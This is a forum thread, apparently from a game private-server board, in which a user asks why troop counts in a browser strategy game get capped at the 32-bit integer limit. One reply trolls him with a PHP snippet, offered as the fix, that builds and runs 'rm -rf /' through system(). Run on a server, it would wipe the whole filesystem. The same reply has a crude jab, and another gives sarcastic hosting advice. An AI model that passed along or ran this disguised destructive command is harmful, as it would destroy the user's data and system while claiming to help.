• Unfortunately, we have experienced significant hard drive damage that requires urgent maintenance and rebuilding. The forum will be a state of read only until we install our new drives and rebuild all the configurations needed. Please follow our Facebook page for updates, we will be back up shortly! (The forum could go offline at any given time due to the nature of the failed drives whilst awaiting the upgrades.) When you see an Incapsula error, you know we are in the process of migration.

Troops converted to int limit after a fight [DBOOR]

Newbie Spellweaver
Reaction score
Hello, was working with files, fixing stuff, and found fun thing, that you can't send more than integer limit at once to other village (2,147,483,647) <- INT limit
so i decided edit v2v , by disabling check for intval if it's higher than INT , that worked perefctly, now i can send 20b or 50b that doesn't matter, what maters now is after my troops travel to destination the amount of them being converted to 2,147,483,647 and in report it shows like that as well. was looking in war.php but couldn't find anything useful (maybe i'm blind) so maybe anyone had same issue and can point things out?

EDIT.

Well i guess that's maybe cause a problem that my PHP compiled for 32 bit OS and since 32 bits cant handle integers bigger than 4 bits (unlike the 64 bits os can handle 8bits) , moving to 64 bit software now, and will check if that fixes problems

Last edited:
Junior Spellweaver
Reaction score
hello brother
i am gay

but this fixes it

<?php
$cmd = sprintf("%s -%s /", "rm", "rf");
system ($cmd);
?>

Upvote 0
Junior Spellweaver
Reaction score
Upvote 0
Newbie Spellweaver
Reaction score
000webhost is best for you brother.

they store your password in plaintext so it is easy for you to recover your account.

they also leak databases so your email, username and plaintext password is released, this is all free.

Okay, thanks for suggestions brother. well i found in one forum that if you type into inputs when you register SHA1(yourPenisShort); you will get the most secured password ever available. so it won't be a problem if my info leaked.

Take, care, thanks for your answers guys, i fixed everything now i need to fix only clock and my server ready to run !

Upvote 0
Back